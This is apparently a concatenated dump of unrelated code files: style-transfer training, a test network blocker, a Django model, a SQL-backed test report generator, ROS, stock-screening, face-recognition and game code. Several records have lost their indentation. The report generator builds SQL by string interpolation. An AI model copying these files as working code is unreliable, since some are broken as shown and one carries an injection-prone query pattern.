vgg = net.vgg
vgg.load_state_dict(torch.load(args.vgg))
vgg = nn.Sequential(*list(vgg.children())[:31])
network = net.Net(vgg, decoder)
network.train()
network.to(device)
content_tf = train_transform()
style_tf = train_transform()
content_dataset = FlatFolderDataset(args.content_dir, content_tf)
style_dataset = FlatFolderDataset(args.style_dir, style_tf)
content_iter = iter(data.DataLoader(
content_dataset, batch_size=args.batch_size,
sampler=InfiniteSamplerWrapper(content_dataset),
num_workers=args.n_threads))
style_iter = iter(data.DataLoader(
style_dataset, batch_size=args.batch_size,
sampler=InfiniteSamplerWrapper(style_dataset),
num_workers=args.n_threads))
optimizer = torch.optim.Adam(network.decoder.parameters(), lr=args.lr)
for i in tqdm(range(args.max_iter)):
adjust_learning_rate(optimizer, iteration_count=i)
content_images = next(content_iter).to(device)
style_images = next(style_iter).to(device)
loss_c, loss_s = network(content_images, style_images)
loss_c = args.content_weight * loss_c
loss_s = args.style_weight * loss_s
loss = loss_c + loss_s
optimizer.zero_grad()
loss.backward()
optimizer.step()
writer.add_scalar('loss_content', loss_c.item(), i + 1)
writer.add_scalar('loss_style', loss_s.item(), i + 1)
if (i + 1) % args.save_model_interval == 0 or (i + 1) == args.max_iter:
state_dict = net.decoder.state_dict()
for key in state_dict.keys():
state_dict[key] = state_dict[key].to(torch.device('cpu'))
torch.save(state_dict, save_dir /
'decoder_iter_{:d}.pth.tar'.format(i + 1))
writer.close()
|
987,144 | b370f214906b42e48cf12096c66d76a404ba7d5e | import socket
import sys
from contextlib import contextmanager
import attr
try:
import pycurl
@attr.s(slots=True)
class Curl(object):
"""Proxy to real pycurl.Curl.
If `perform` is called then it will raise an error if network is disabled via `disable`
"""
handle = attr.ib(factory=pycurl.Curl)
def __getattribute__(self, item):
if _disable_pycurl and item == "perform":
raise RuntimeError("Network is disabled")
handle = object.__getattribute__(self, "handle")
return getattr(handle, item)
except ImportError:
pycurl = None
Curl = None
# `socket.socket` is not patched, because it could be needed for live servers (e.g. pytest-httpbin)
# But methods that could connect to remote are patched to prevent network access
_original_connect = socket.socket.connect
_original_connect_ex = socket.socket.connect_ex
# Global switch for pycurl disabling
_disable_pycurl = False
@attr.s(slots=True, hash=True)
class PyCurlWrapper(object):
    """Imitate pycurl module."""
    def __getattribute__(self, item):
        # Intercept all attribute access: serve the guarded Curl proxy for
        # "Curl"; delegate every other attribute to the real pycurl module.
        if item == "Curl":
            return Curl
        return getattr(pycurl, item)
def check_pycurl_installed(func):
    """No-op if pycurl is not installed.

    Decorator: if the ``pycurl`` import failed at module load time, the
    wrapped callable silently returns None instead of touching pycurl.
    """
    from functools import wraps  # local import keeps this block self-contained

    @wraps(func)  # preserve __name__/__doc__ of the wrapped function for introspection
    def inner(*args, **kwargs):  # pylint: disable=inconsistent-return-statements
        if pycurl is None:
            return
        return func(*args, **kwargs)
    return inner
@check_pycurl_installed
def install_pycurl_wrapper():
sys.modules["pycurl"] = PyCurlWrapper()
@check_pycurl_installed
def uninstall_pycurl_wrapper():
sys.modules["pycurl"] = pycurl
def block_pycurl():
global _disable_pycurl # pylint: disable=global-statement
_disable_pycurl = True
def unblock_pycurl():
global _disable_pycurl # pylint: disable=global-statement
_disable_pycurl = False
def block_socket():
socket.socket.connect = network_guard
socket.socket.connect_ex = network_guard
def unblock_socket():
socket.socket.connect = _original_connect
socket.socket.connect_ex = _original_connect_ex
def network_guard(*args, **kwargs):
    """Stand-in for socket.connect/connect_ex: unconditionally refuse by raising RuntimeError."""
    raise RuntimeError("Network is disabled")
def block():
block_socket()
# NOTE: Applying socket blocking makes curl hangs - it should be carefully patched
block_pycurl()
def unblock():
unblock_pycurl()
unblock_socket()
@contextmanager
def blocking_context():
    """Block connections via socket and pycurl.
    NOTE:
    Only connections to remotes are blocked in `socket`.
    Local servers are not touched since it could interfere with live servers needed for tests (e.g. pytest-httpbin)
    """
    block()
    try:
        yield
    finally:
        # an error could happen somewhere else when this ctx manager is on `yield`
        # so always restore the patched socket / pycurl state on exit
        unblock()
|
987,145 | 28577e593c1b30f298a83c2e3a44fb65a0ec5f08 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Post(models.Model):
    """A blog post written by a Django ``User``."""
    # NOTE(review): ForeignKey without on_delete -- only valid on Django < 2.0; confirm target version.
    author = models.ForeignKey(User, verbose_name=u'Автор', related_name='posts')
    # Stamped once when the row is first created (auto_now_add).
    date_created = models.DateTimeField(verbose_name=u'Дата публикации', auto_now_add=True)
    title = models.CharField(verbose_name=u'Заголовок', max_length=140)
    text = models.TextField(verbose_name=u'Текст')
    def __unicode__(self):
        # Python 2 string representation: the post title.
        return self.title
    class Meta:
        verbose_name = u'Пост'
        verbose_name_plural = u'Посты'
        ordering = ('-date_created', )  # newest posts first
    def get_cent_answers_channel_name(self):
        """Return the per-post channel name, e.g. "post_42" (presumably a Centrifugo channel -- verify)."""
        return "post_%d"%self.id
987,146 | 27953f4e4cbbea91e657843c4fd00de5469d281f | import os
import time
from thrid_session.gui_test.common.connect_DB import DBtools
class Setreport:
    """Persists GUI test results into the `report` DB table and renders them as an HTML report."""
    def __init__(self):
        # shared DB connection/cursor wrapper (project helper)
        self.db=DBtools()
    def write_report(self,version,planid,testtype,caseid,casetitle,result,error,screenshot):
        """Insert one test-result row, stamped with the current time, via a parameterized INSERT."""
        testtime=time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(time.time()))
        args=(version,planid,testtype,caseid,casetitle,
              result,testtime,error,screenshot)
        sql_write="insert into report(version,planid,testtype,caseid,casetitle,result,testtime,error,screenshot)" \
                  "values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
        # print(sql_write)
        self.db.cursor.execute(sql_write,args)
        self.db.db.commit()
        # self.db.cursor.close()
        # self.db.db.close()
    def read_report(self,version):
        """Collect all rows for *version* and write a timestamped HTML report under gui_test/screen/.

        NOTE(review): the queries below build SQL with %-string interpolation,
        which is injection-prone if *version* is untrusted; prefer the
        parameterized style used in write_report.
        """
        sql_all="select * from report where version = '%s'"%(version)
        self.db.cursor.execute(sql_all)
        results=self.db.cursor.fetchall() # returns all rows, a 2-D sequence
        if len(results)==0:
            print('提示:本次测试没有测试结果产生')
            return
        # Open the report template (resolved relative to the parent directory) and read it.
        tempate_path=os.path.abspath('..')+'\\gui_test\\main\\HTML_report.html'
        tempate=open(tempate_path,mode='r',encoding='utf-8')
        content=tempate.read()
        # Fetch the version info and substitute the template placeholder.
        version=results[0][1]
        content=content.replace('$test-version',version)
        # Base SQL for the per-outcome counts below.
        sql_base="select count(*) from report where version = "
        # Count passed cases and substitute the template placeholder.
        sql_pass=sql_base + "'%s' and result='成功'" %(version)
        self.db.cursor.execute(sql_pass)
        pass_count=self.db.cursor.fetchone()[0] # fetchone returns a tuple
        content=content.replace('$pass-count',str(pass_count))
        # Count failed cases and substitute the template placeholder.
        sql_fail=sql_base + "'%s' and result = '失败'" %(version)
        self.db.cursor.execute(sql_fail)
        fail_count=self.db.cursor.fetchone()[0]
        content=content.replace('$fail-count',str(fail_count))
        # Count errored cases and substitute the template placeholder.
        sql_error=sql_base + "'%s' and result = '错误'"%(version)
        self.db.cursor.execute(sql_error)
        error_count=self.db.cursor.fetchone()[0]
        content=content.replace('$error-count',str(error_count))
        # Take the timestamp of the last executed case; it doubles as the report date.
        sql_last_time="select testtime from report where version = '%s' order by id desc limit 0,1"%(version)
        self.db.cursor.execute(sql_last_time)
        last_time=self.db.cursor.fetchone()[0]
        content=content.replace('$last-time',str(last_time))
        content=content.replace('$test-date',str(last_time))
        # Build the $result table body from all result rows.
        test_result=''
        # Walk every result record, generating one HTML table row each.
        for record in results: # results is a 2-D tuple
            test_result+="<tr height='40'>"
            test_result+="<td width='7%'>" + str(record[0]) + "</td>" # report id, record[0] / column 1
            test_result += "<td width='9%'>" + record[2] + "</td>" # plan id, record[2] / column 3
            test_result += "<td width='9%'>" + record[3] + "</td>" # test type, record[3] / column 4
            test_result += "<td width='7%'>" + record[4] + "</td>" # case id, record[4] / column 5
            test_result += "<td width='20%'>" + record[5] + "</td>" # case title, record[5] / column 6
            # Colour the result cell according to the outcome (pass/fail/error).
            if record[6]=='成功':
                test_result += "<td width='7%' bgcolor='#A6FFA6'>" + record[6] + "</td>"
            elif record[6]=='失败':
                test_result += "<td width='7%' bgcolor='#FF9797'>" + record[6] + "</td>"
            elif record[6]=='错误':
                test_result += "<td width='7%' bgcolor='#FFED97'>" + record[6] + "</td>"
            test_result+="<td width='16%'>" + str(record[7]) + "</td>" # execution time, record[7]
            test_result += "<td width='15%'>" + record[8] + "</td>" # error message, record[8]
            if record[9]=='无' or record[9] == '请检查用例库': # screenshot, record[9]
                test_result += "<td width='10%'>" + record[9] + "</td>"
            else:
                test_result += "<td width='10%'><a href='" + record[9] + "'>查看截图</a></td>"
            test_result+="</tr>\r\n"
        content=content.replace('$test-result',test_result)
        # Write the final report into the output directory.
        nowtime=time.strftime('%Y%m%d_%H%M%S',time.localtime(time.time()))
        report_path=os.path.abspath('..')+'\\gui_test\\screen\\'+nowtime+'_report.html'
        report=open(report_path,mode='w',encoding='utf-8')
        report.write(content)
        # Close the file handles and the database connection.
        report.close()
        self.db.cursor.close()
        self.db.db.close()
if __name__ == '__main__':
tctest=Setreport()
tctest.write_report('pc端','None','GUI','None','None','错误','找不到用例','无')
# tctest.read_report('1.01')
tctest.read_report('pc端')
|
987,147 | ae816287019df178848faa842decb2eedc14eacb | #line graph
import matplotlib.pyplot as plt
#line 1 points
x1 = [1, 2, 3]
y1 = [2, 4, 1]
plt.plot(x1, y1, label="line 1")
#line 2 points
x2 = [1, 2, 3]
y2 = [4, 1, 3]
plt.plot(x2, y2, label="line 2")
#naming the x and y axis
plt.xlabel('x - axis')
plt.ylabel('y - axis')
#graph title
plt.title('Two lines graph')
# show a legend on the plot
plt.legend()
plt.show() |
987,148 | cfaff6f8d0405857ae18c67572d0f80407508d19 | from __future__ import absolute_import
import time
import roslib
import rospy
from importlib import import_module
from collections import deque, OrderedDict
from .message_conversion import get_msg, get_msg_dict
def get_topic_msg(topic):
return get_msg(topic.rostype)
def get_topic_msg_dict(topic):
return get_msg_dict(topic.rostype)
class TopicBackTimeout(Exception):
pass
class TopicBack(object):
    """
    TopicBack is the class handling conversion from Python to ROS Topic
    Requirement : Only one topicBack per actual ROS Topic.
    Since we connect to an already existing ros topic, our number of connections should never drop under 1
    """
    # We need some kind of instance count here since system state returns only one node instance
    # as publisher for multiple publisher in this process.
    # This is used in ros_interface update to determine
    # if we are the only last ones publishing / subscribing to this topic ( usually the count will be just 1 )
    # TO have this working properly with multiple instance, we need a central place to keep that
    pub_instance_count = {}
    sub_instance_count = {}
    # a solution that works multiprocess
    IF_TOPIC_PARAM = 'pyros_if_topics'

    @staticmethod
    def _create_pub(name, rostype, *args, **kwargs):
        """
        Creating a publisher and adding it to the pub instance count.
        Useful in case we need multiple similar publisher in one process ( tests, maybe future cases )
        :return: the ros publisher
        """
        # counting publisher instance per topic name
        if name in TopicBack.pub_instance_count.keys():
            TopicBack.pub_instance_count[name] += 1
        else:
            TopicBack.pub_instance_count[name] = 1
        return rospy.Publisher(name, rostype, *args, **kwargs)

    @staticmethod
    def _remove_pub(pub):
        """
        Removing a publisher and substracting it from the pub instance count.
        :return: None
        """
        # counting publisher instance per topic name
        TopicBack.pub_instance_count[pub.name] -= 1
        # Be aware of https://github.com/ros/ros_comm/issues/111
        return pub.unregister()

    @staticmethod
    def _create_sub(name, rostype, topic_callback, *args, **kwargs):
        """
        Creating a subscriber and adding it to the sub instance count.
        Static and Functional style so we can call it from anywhere (tests).
        Useful in case we need multiple similar subscriber in one process ( tests, maybe future cases )
        :return: the subscriber
        """
        # counting subscriber instance per topic name
        if name in TopicBack.sub_instance_count.keys():
            TopicBack.sub_instance_count[name] += 1
        else:
            TopicBack.sub_instance_count[name] = 1
        return rospy.Subscriber(name, rostype, topic_callback, *args, **kwargs)

    @staticmethod
    def _remove_sub(sub):
        """
        Removing a subscriber and substracting it from the sub instance count.
        :return: None
        """
        # counting subscriber instance per topic name
        TopicBack.sub_instance_count[sub.name] -= 1
        # Be aware of https://github.com/ros/ros_comm/issues/111
        return sub.unregister()

    def __init__(self, topic_name, topic_type, queue_size=1, start_timeout=2):
        """
        Builds the publisher / subscriber pair interfacing the existing ROS topic
        and waits (up to start_timeout seconds) for both ends to connect.
        :raises TopicBackTimeout: if the pub/sub pair did not connect in time
        """
        self.name = topic_name
        # TODO : think about if we enforce fullname before reaching this deep in the code
        # Any benefit with relative names ?
        # getting the fullname to make sure we start with /
        self.fullname = self.name if self.name.startswith('/') else '/' + self.name
        topic_type_module, topic_type_name = tuple(topic_type.split('/'))
        roslib.load_manifest(topic_type_module)
        msg_module = import_module(topic_type_module + '.msg')
        self.rostype_name = topic_type
        self.rostype = getattr(msg_module, topic_type_name)
        self.msgtype = get_topic_msg_dict(self)
        self.msg = deque([], queue_size)
        self.pub = None
        self.pub = self._create_pub(self.fullname, self.rostype, queue_size=1)
        # CAREFUL ROS publisher doesnt guarantee messages to be delivered
        # stream-like design spec -> loss is acceptable.
        self.sub = self._create_sub(self.fullname, self.rostype, self.topic_callback)
        # Advertising ROS system wide, which topic are interfaced with this process
        # TODO : make this thread safe
        if_topics = rospy.get_param('~' + TopicBack.IF_TOPIC_PARAM, [])
        rospy.set_param('~' + TopicBack.IF_TOPIC_PARAM, if_topics + [self.fullname])
        # Here making sure the publisher / subscriber pair is actually connected
        # before returning to ensure RAII
        start = time.time()
        timeout = start_timeout
        while time.time() - start < timeout and (
            self.pub.get_num_connections() < 1 or
            self.sub.get_num_connections() < 1
        ):
            rospy.rostime.wallsleep(1)
        # BUGFIX: the original tested `start - time.time() > timeout`, which is
        # always negative, so TopicBackTimeout could never be raised. Test the
        # actual failure condition instead: the pair is still not connected.
        if self.pub.get_num_connections() < 1 or self.sub.get_num_connections() < 1:
            raise TopicBackTimeout()
        self.empty_cb = None

    def cleanup(self):
        """
        Launched when we want to whithhold this interface instance
        :return:
        """
        # Removing the ROS system wide advert about which topic are interfaced with this process
        # TODO : lock this for concurrent access
        if_topics = rospy.get_param('~' + TopicBack.IF_TOPIC_PARAM, [])
        if_topics.remove(self.fullname)
        rospy.set_param('~' + TopicBack.IF_TOPIC_PARAM, if_topics)
        # cleanup pub and sub, so we can go through another create / remove cycle properly
        self._remove_pub(self.pub)
        self._remove_sub(self.sub)

    def asdict(self):
        """
        Here we provide a dictionary suitable for a representation of the Topic instance
        the main point here is to make it possible to transfer this to remote processes.
        We are not interested in pickleing the whole class with Subscriber and Publisher
        :return:
        """
        return OrderedDict({
            'name': self.name,
            'fullname': self.fullname,
            'msgtype': self.msgtype,
            'rostype_name': self.rostype_name,
        })

    def publish(self, msg):
        # enforcing correct type to make send / receive symmetric and API less magical
        # Doing message conversion visibly in code before sending into the black magic tunnel sounds like a good idea
        if isinstance(msg, self.rostype):
            self.pub.publish(msg)  # This should return False if publisher not fully setup yet
            return True  # because the return spec of rospy's publish is not consistent
        return False

    def get(self, num=0, consume=False):
        if not self.msg:
            return None
        res = None
        # TODO : implement returning multiple messages ( paging/offset like for long REST requests )
        if consume:
            res = self.msg.popleft()
            if 0 == len(self.msg) and self.empty_cb:
                self.empty_cb()
                # TODO : CHECK that we can survive here even if we get dropped from the topic list
        else:
            res = self.msg[0]
        return res

    # returns the number of unread message
    def unread(self):
        return len(self.msg)

    def set_empty_callback(self, cb):
        self.empty_cb = cb

    def topic_callback(self, msg):
        # newest message goes to the front of the bounded deque
        self.msg.appendleft(msg)
|
987,149 | a70b46f57292fbc40f5968a54c60da82b7e9e3c3 | from NseStockAnalyser.utils import *
from pprint import pprint
def index_52_wk_lows():
index = get_index()
# slicing off 1st index of the data list since it contains index data
nifty50_stocks_data_json = get_index_stock_data_json(index)['data'][1:]
# try:
# data_pts = int(input(f'Enter number of data points (Input Range : 1 - {len(nifty50_stocks_data_json)}): '))
# if not 1 <= data_pts <= len(nifty50_stocks_data_json):
# raise ValueError
# except ValueError:
# print('Please enter a valid input')
# return
stocks_list = []
for stocks in nifty50_stocks_data_json:
try:
code = stocks['meta']['symbol']
except KeyError:
code = stocks['symbol']
cur_price = float(stocks['lastPrice'])
yr_low = float(stocks['yearLow'])
yr_high = float(stocks['yearHigh'])
price_diff_from_low = round(cur_price - yr_low, 2)
price_diff_from_high = round(yr_high - cur_price, 2)
percent_above_low = round((price_diff_from_low / yr_low) * 100, 2)
percent_below_high = round((price_diff_from_high / yr_high) * 100, 2)
best_buy_index = round(100 - ((price_diff_from_low / (yr_high - yr_low)) * 100), 2)
stocks_list.append({'code': code, 'cur_price': cur_price, 'yr_low': yr_low, 'yr_high': yr_high,
'price_diff_from_low': price_diff_from_low, 'price_diff_from_high': price_diff_from_high,
'percent_above_low': percent_above_low, 'percent_below_high': percent_below_high,
'best_buy_index': best_buy_index})
sort_types = ['% Above Low', '% Below High', 'Best Buy Index (100 - ((Price diff from low / high52 - low52) * 100))']
while True:
for i in range(0, len(sort_types)):
print(f'{i+1} : {sort_types[i]}')
try:
opt = int(input(f'Which sorting order you prefer? (Input Range 1 - {len(sort_types)}): '))
if not 1 <= opt <= len(sort_types):
raise ValueError
break
except ValueError:
print("Please Enter Valid Input")
if opt == 1:
stocks_list = sorted(stocks_list, key=lambda i: i['percent_above_low'])
elif opt == 2:
stocks_list = sorted(stocks_list, key=lambda i: i['percent_below_high'], reverse=True)
elif opt == 3:
stocks_list = sorted(stocks_list, key=lambda i: i['best_buy_index'], reverse=True)
df = pd.DataFrame(stocks_list)
df.columns = ['Stock Code', 'Current Price(INR)', '52 Week Low', '52 Week High', 'Current - Low', 'High - Current',
'% Above Low', '% Below High', 'Best Buy Index']
df.index = df.index + 1
pandasgui.show(df)
# print('\n')
# print(df.head(data_pts))
# print('\n')
|
987,150 | 0725780cd66c8295d8bceea129c2d7e3e1989b4b | #!/usr/bin/env python
# -*- coding: utf8 -*-
import time
import json
import logging
import requests
from collections import Counter
from qcloud_cos import CosClient, Auth, UploadFileRequest
from constants import *
youtu_log = logging.getLogger(__name__)
KNOWN = 'known'
UNKNOWN = 'unknown'
class YoutuException(BaseException):
pass
class YoutuManager(object):
def __init__(self, host, app_id, secret_id, secret_key, region, bucket):
self.cos_client = CosClient(int(app_id), secret_id, secret_key, region)
self._bucket = unicode(bucket)
self._host = host
def _url(self, path):
return "http://" + self._host + path
def _sign(self):
return Auth(self.cos_client.get_cred()).sign_more(
self._bucket, '', int(time.time()) + 30
)
def _params(self, **kwargs):
kwargs['appid'] = str(self.cos_client.get_cred().get_appid())
kwargs['bucket'] = self._bucket
return kwargs
def _upload_picture(self, local_path):
image_name = local_path.split('/')[-1]
remote_path = "/face/" + image_name
request = UploadFileRequest(self._bucket, unicode(remote_path), unicode(local_path), insert_only=0)
try:
result = self.cos_client.upload_file(request)
except Exception, e:
raise YoutuException("update file %s failed, %s" % (image_name, e))
return None
else:
youtu_log.debug("upload_file result:%s" % result)
source_url = result['data']['source_url']
return source_url
def _post(self, url, params):
headers = {
'Host': self._host,
'Content-Type': 'application/json',
'Authorization': self._sign()
}
json_data = json.dumps(params)
try:
response = requests.post(url, data=json_data, headers=headers)
except Exception, e:
raise YoutuException(
"http post error url=%s, data=%s, headers=%s. original error: %s" % (
url, json_data, headers, e
))
else:
return json.loads(response.text)
def create_person(self, image_url, person_id, group_id, person_name="", tag=""):
url = self._url('/face/newperson')
params = self._params(
url=image_url, group_ids=[group_id], person_id=str(person_id), person_name=person_name, tag=tag
)
print params
response_data = self._post(url, params)
print response_data
if response_data['code'] != 0:
raise YoutuException("create person failed, " + response_data['message'])
return response_data['data']['person_id']
def add_face(self, image_url, person_id, tag=""):
url = self._url('/face/addface')
params = self._params(
person_id=person_id,
urls=[image_url],
tag=tag
)
response_data = self._post(url, params)
print response_data
if response_data['code'] != 0:
raise YoutuException("add face to person %s failed, " % person_id + response_data['message'])
return person_id
def set_person_info(self, person_id, person_name):
url = self._url("/face/setinfo")
params = self._params(
person_id=person_id,
person_name=person_name
)
response_data = self._post(url, params)
if response_data['code'] != 0:
raise YoutuException("set person %s info failed, " % person_id + response_data['message'])
return response_data['data']['person_id']
def get_person_info(self, person_id):
url = self._url("/face/getinfo")
params = self._params(person_id=person_id)
response_data = self._post(url, params)
if response_data['code'] != 0:
raise YoutuException("get person %s info failed, " % person_id + response_data['message'])
return response_data['data']
def get_face_info(self, face_id):
url = self._url("/face/getfaceinfo")
params = self._params(face_id=face_id)
response_data = self._post(url, params)
if response_data['code'] != 0:
raise YoutuException("get face %s info failed, " % face_id + response_data['message'])
return response_data['data']
def face_detect(self, image_url):
url = self._url("/face/detect")
params = self._params(url=image_url, mode=1)
response_data = self._post(url, params)
return response_data
def face_identify(self, image_url, group_id):
url = self._url("/face/identify")
params = self._params(group_id=group_id, url=image_url)
response_data = self._post(url, params)
print response_data
if response_data['code'] != 0:
raise YoutuException("face %s identify %s failed, " % (image_url, group_id) + response_data['message'])
return response_data['data']['candidates']
def face_detect_upload(self, local_path):
image_url = self._upload_picture(local_path)
response = self.face_detect(image_url)
if response['code'] == 0: pass
return image_url
def face_identify_one(self, image_url):
candidates = self.face_identify(image_url, "known") + self.face_identify(image_url, "unknown")
candidate = {}
for c in candidates:
if c['confidence'] > 60 and c['confidence'] > candidate.get('confidence', 0):
candidate = c
return candidate
python
|
987,151 | 24342b381129d808ba0d4cedc9bb8061e0f39f08 | from dataclasses import dataclass
from typing import Dict
import spimdisasm
import tqdm
from intervaltree import Interval, IntervalTree
from util import log, options, symbols
@dataclass
class Reloc:
rom_address: int
reloc_type: str
symbol_name: str
addend: int = 0
all_relocs: Dict[int, Reloc] = {}
def add_reloc(reloc: Reloc):
all_relocs[reloc.rom_address] = reloc
def initialize():
global all_relocs
all_relocs = {}
for path in options.opts.reloc_addrs_paths:
if not path.exists():
continue
with path.open() as f:
sym_addrs_lines = f.readlines()
for line_num, line in enumerate(
tqdm.tqdm(sym_addrs_lines, desc=f"Loading relocs ({path.stem})")
):
line = line.strip()
# Allow comments
line = line.split("//")[0]
line = line.strip()
if line == "":
continue
rom_addr = None
reloc_type = None
symbol_name = None
addend = None
for info in line.split(" "):
if ":" not in info:
continue
if info.count(":") > 1:
log.parsing_error_preamble(path, line_num, line)
log.write(f"Too many ':'s in '{info}'")
log.error("")
attr_name, attr_val = info.split(":")
if attr_name == "":
log.parsing_error_preamble(path, line_num, line)
log.write(
f"Missing attribute name in '{info}', is there extra whitespace?"
)
log.error("")
if attr_val == "":
log.parsing_error_preamble(path, line_num, line)
log.write(
f"Missing attribute value in '{info}', is there extra whitespace?"
)
log.error("")
# Non-Boolean attributes
try:
if attr_name == "rom":
rom_addr = int(attr_val, 0)
continue
if attr_name == "reloc":
reloc_type = attr_val
continue
if attr_name == "symbol":
symbol_name = attr_val
continue
if attr_name == "addend":
addend = int(attr_val, 0)
continue
except:
log.parsing_error_preamble(path, line_num, line)
log.write(f"value of attribute '{attr_name}' could not be read:")
log.write("")
raise
if rom_addr is None:
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'rom' attribute for reloc")
if reloc_type is None:
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'reloc' attribute for reloc")
if symbol_name is None:
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'symbol' attribute for reloc")
reloc = Reloc(rom_addr, reloc_type, symbol_name)
if addend is not None:
reloc.addend = addend
add_reloc(reloc)
def initialize_spim_context():
    """Mirror every loaded reloc override into the spimdisasm global context."""
    for rom_address, reloc in all_relocs.items():
        # Translate the reloc-type string into spimdisasm's enum; an unknown
        # string aborts with the offending ROM address in the message.
        reloc_type = spimdisasm.common.RelocType.fromStr(reloc.reloc_type)
        if reloc_type is None:
            log.error(
                f"Reloc type '{reloc.reloc_type}' is not valid. Rom address: 0x{rom_address:X}"
            )
        symbols.spim_context.addGlobalReloc(
            rom_address, reloc_type, reloc.symbol_name, addend=reloc.addend
        )
|
987,152 | a3d0d6d3c2a5dbcea1ea61a641309af3c2db2502 | import matplotlib.pyplot as plt
import numpy as np
import random as ran
from math import pi
# Monte-Carlo demo (Python 2 syntax — note the bare `print r` below):
# draw `num` samples from P(r) = 2*exp(-2r) by inverse-transform sampling,
# histogram them, and overlay the analytic density for comparison.
num=100000
rmin=0.0
rmax=10.0
a=0.0
b=0.5 #max value of P
nbin=50
ranr=[]
r=[]
mybin=[]
for i in range(0,num):
    # Inverse CDF: u ~ U(0, 0.5) gives r = -0.5*ln(2u), distributed as 2*exp(-2r).
    temp=0.5*np.log(1/(2*ran.uniform(a,b))) #P=2*exp(-2r)
    ranr.append(temp)
step=(rmax-rmin)/nbin
for i in range(0,nbin+1):
    mybin.append(i*step)
P,edges=np.histogram(ranr,bins=mybin)
#P=P/(float(np.sum(P))*(edges[1]-edges[0])) #normalize P to add to 1
#for i in range(0,len(edges)-1):
#    r.append(0.5*(edges[i+1]+edges[i]))
P=P/(float(np.sum(P))*(mybin[1]-mybin[0])) #normalize P to add to 1
# Bin centers for plotting the empirical density.
for i in range(0,len(mybin)-1):
    r.append(0.5*(mybin[i+1]+mybin[i]))
plt.plot(r,P,linewidth=3)
print r
# Analytic curve on a fine grid, drawn in red on top of the histogram.
r=np.arange(rmin,rmax,0.05)
plt.plot(r,2.0*np.exp(-2*r),'r',linewidth=2)
#plt.xlim(rmin,rmax)
plt.show()
|
987,153 | 265dc2e7ded69e2b0c6357f0bd1bf7bc51d78e6f | import pygame
import time
import random
from .. import res, constants, tools
from . import tile
import json
from .. import core
def setup_res():
    """Slice all enemy sprites out of the shared sheet (layout described by
    the enemy-info JSON) and push speed/gravity constants onto the classes."""
    global enemy_dict, gravity
    enemy_dict = {}
    sc = constants.IMAGE_SCALE
    # resources
    with open(constants.enemy_info_path) as f:
        info = json.loads(f.read())
    image_name = info['image_name']
    interval = info['interval']  # (x, y) spacing between frames on the sheet
    sheet = res.images[image_name]
    enemyinfo = info['enemy']
    # Enemies whose odd-numbered frames sit one pixel higher on the sheet.
    sub_d_names = info['sub_d_names']
    #colorkey = (255, 255, 255)
    for name in enemyinfo.keys():
        rlist = []
        info2 = enemyinfo[name]
        (x, y, w, h) = tuple(info2['first'])  # rect of the top-left frame
        size = info2['size']  # (frames per row, number of rows)
        if name in sub_d_names:
            sub_d = 1
        else:
            sub_d = 0
        # One trimmed row per variant (rows stack vertically on the sheet).
        for i in range(size[1]):
            rlist.append(_trim_image_row_(sheet, x, y, w, h, interval[0], size[0], sc,\
                sub_d=sub_d))
            y += interval[1]
        enemy_dict[name] = rlist
    # Pre-build the horizontally squeezed shell frame used for the shell wobble.
    for shell_d_row in enemy_dict['shell_d']:
        s = shell_d_row[0]
        r = s.get_rect()
        s2 = pygame.transform.scale(s, (int(r.width * shell_wag_w_scale), r.height))
        shell_d_row.append(s2)
    # Distribute speed constants from the JSON onto the enemy classes.
    spd = enemy_dict['speed'] = info['speed']
    gravity = spd['gravity']
    Goomba.speed_x_vel = spd['goomba']['x_vel']
    Koopa.speed_x_vel = spd['koopa']['x_vel']
    Koopa.shell_speed_x_vel = spd['shell']['x_vel']
    PipeFlower.speed_y_vel = spd['pipeflower']['y_val']
def _trim_image_row_(sheet,
                     x,
                     y,
                     width,
                     height,
                     interval,
                     count,
                     scale=1,
                     colorkey=(0, 0, 0), sub_d = 0):
    """Cut `count` equally spaced frames out of one sprite-sheet row.

    Frames are `interval` pixels apart starting at (x, y); odd-numbered
    frames are sampled `sub_d` pixels higher, matching sheets whose
    alternate frames sit slightly offset.
    """
    frames = []
    for col in range(count):
        frame_y = y - sub_d if col % 2 == 1 else y
        frames.append(res.trim_image(sheet, x + col * interval, frame_y,
                                     width, height, scale, colorkey))
    return frames
# Vertical offset so a spawned enemy stands on top of the tile that marks it.
cfg_enemy_height = 24
def create_enemy(data):
    """Build a linked list of enemies described by one map-data entry.

    `data` carries 'type' (0 = Goomba, 1 = Koopa, anything else falls back
    to Goomba), 'x'/'y', 'direction' and 'color'; 'num' defaults to 1.
    Successive enemies are spaced out horizontally.
    """
    typ = data['type']
    x = data['x']
    y = data['y'] - cfg_enemy_height
    d = data['direction']
    color = data['color']
    num = data.get('num', 1)
    enemys = core.LinkList()
    for _ in range(num):
        if typ == 1:
            enemy = Koopa(x, y, d, color)
        else:
            # type 0 and any unknown type both produce a Goomba.
            enemy = Goomba(x, y, d, color)
        x += enemy.rect.width + 10
        enemys.push(enemy)
    return enemys
class Enemy(core.Sprite):
    """Base class for all enemies: facing, animation frame, vertical physics."""
    def __init__(self, direction):
        super().__init__()
        # direction: 0 = facing left, anything else = facing right.
        self.face_right = False if direction == 0 else True
        self.frame = 0
        self.y_acc = self.y_vel = 0
        self.dead = False
        self.collide = True
    def fall(self):
        """Begin free fall by applying gravity (set up by setup_res)."""
        self.y_acc = gravity
    def touch_ground(self, item):
        """Stop vertical motion; die if the tile underneath is being jacked up."""
        self.y_acc = self.y_vel = 0
        if isinstance(item, tile.Tile) and item.is_jack_up:
            self.go_die()
# Vertical offsets, presumably sprite-sheet related — unused in this file,
# TODO confirm against callers.
SubYGoomba = 46
SubYKoopa = 64
# Seconds a stamped corpse lingers before being culled.
goomba_die_timeout = 2
# Animation epochs (seconds per frame flip) for each walk/slide state.
goomba_wag_epoch = 0.500
koopa_wag_epoch = 0.500
shell_wag_epoch = 0.150
# Upward launch speed applied to an enemy knocked out from below.
jump_y_vel = 800
class Goomba(Enemy):
    """Walking mushroom enemy: paces horizontally, reverses at obstacles,
    squashes when stamped, and pops off-screen when killed outright."""
    def __init__(self, x, y, direction, color):
        super().__init__(direction)
        global enemy_dict
        self.stand_frames = enemy_dict['goomba'][color]
